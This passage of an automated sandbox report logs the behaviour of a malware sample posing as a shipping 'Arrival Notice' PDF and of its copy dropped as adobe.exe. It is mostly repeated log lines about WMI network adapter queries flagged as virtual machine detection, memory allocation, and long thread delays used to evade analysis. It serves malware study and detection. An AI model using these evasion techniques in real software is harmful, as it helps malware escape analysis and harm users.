Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: 2720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Memory allocated: 4A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 17C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 4E40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598873	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598513	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598380	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598182	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596863	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596504	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595575	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595450	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595339	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599667	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595941	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595527	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595402	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595289	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594934	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594823	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594606	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599694	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599586	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599198	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597080	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596723	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594421	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Window / User API: threadDelayed 5915	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe	Window / User API: threadDelayed 3932	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 2785	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 5978	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 6550	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 3298	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2188	Thread sleep count: 5915 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2188	Thread sleep count: 3932 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598513s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598380s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598182s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596863s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596504s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595685s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595450s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe TID: 2036	Thread sleep time: -594687s >= -30000s	Jump to behavior
